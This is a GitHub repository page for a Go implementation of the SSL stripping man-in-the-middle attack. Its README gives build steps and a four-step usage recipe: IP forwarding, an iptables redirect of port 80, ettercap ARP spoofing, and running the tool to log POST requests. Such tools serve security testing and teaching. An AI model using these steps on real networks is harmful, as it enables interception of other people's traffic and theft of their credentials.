Skip to content
/ sslstrip Public

A MITM tool that implements SSL stripping attack.

License

Notifications You must be signed in to change notification settings

nvlbg/sslstrip

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Sslstrip

This is a tool that implements Moxie Marlinspike's SSL stripping attacks, written in Go. Inspired by https://github.com/moxie0/sslstrip.

Requirements

The only requirment is Go. There are no further dependencies, only the standard library of the language. We have used Go version 1.9.2 but it should work fine with other versions as well. Please, open issue if you encounter a problem.

Installing

$ # clone the repo in your $GOPATH/src/sslstrip
$ cd $GOPATH/src/sslstrip/cli
$ go build main.go
$ ./main -h
Usage of ./main:
-filename string
  	the output log file or empty for stdout
-log-response
  	log responses
-port int
  	port to listen on (default 8000)
-post-only
  	log only POST requests

Usage

  1. Flip your machine into forwarding mode (as root):

$ echo "1" > /proc/sys/net/ipv4/ip_forward

  1. Setup iptables to intercept HTTP requests (as root):

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

  1. Run an arpspoof attack to redirect traffic to your machine. For example with ettercap

$ ettercap -q -T -M arp

  1. Run sslstrip with the command-line options you'd like (see above).

Contributing

If you want to contribute feel free to send a pull request.

Also, if you found a bug or some wrong information in these pages you can open an issue.

License

This program is provided under an MIT open source license, read the LICENSE file for details.

About

A MITM tool that implements SSL stripping attack.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages